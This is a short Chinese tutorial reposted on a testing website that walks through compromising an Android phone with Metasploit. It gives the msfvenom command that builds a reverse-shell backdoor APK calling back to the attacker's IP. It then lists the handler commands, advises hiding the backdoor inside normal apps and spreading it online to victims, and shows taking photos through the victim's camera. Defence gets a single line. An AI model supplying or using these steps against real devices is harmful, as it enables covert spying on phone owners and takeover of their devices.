演示使用Metasploit入侵Android

发表于:2021-6-11 09:46  作者:罗道义   来源:博客园

字体: | 上一篇 | 下一篇 |我要投稿 | 推荐标签: Metasploit 安全测试工具

  文本演示怎么使用Kali Linux入侵Android手机
  Kali Linux IP地址:192.168.0.112;接收连接的端口:443。
   
  同一局域网内android手机一部(android 5.1)
  创建一个后门程序
  在终端中执行:
  # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk
  这个后门程序(APK)是发送给受害者的;要把上面命令的IP地址替换为攻击者IP,当后门程序运行时,它会试图连接这个IP。
  启动Metasploit-等待受害者启动后门程序
  msfconsole
   
  依次执行:
  msf > use exploit/multi/handler
  > set payload android/meterpreter/reverse_tcp
  > set lhost 192.168.0.112
  > set lport 443
  > exploit
   
  分发后门程序
  一般后门程序都打包到正常app中,反正就是各种藏;
  借助internet分发后门程序。
  闲话不多书,这里我在自己的android手机上安装运行带后门的apk。
    
  病毒!!!
  控制受害者手机
  受害者运行后门程序之后,就可以使用Metasploit控制他了:
    
  使用help查看可以使用的命令:
   
  例如使用对方的摄像头拍照:
  > webcam_list
  > webcam_snap
  怎么防范:
  不要安装不信任的apk
    

上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。

评 论

论坛新帖



建议使用IE 6.0以上浏览器,800×600以上分辨率,法律顾问:上海信义律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2021, 沪ICP备05003035号
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪公网安备 31010102002173号

51Testing官方微信

51Testing官方微博

扫一扫 测试知识全知道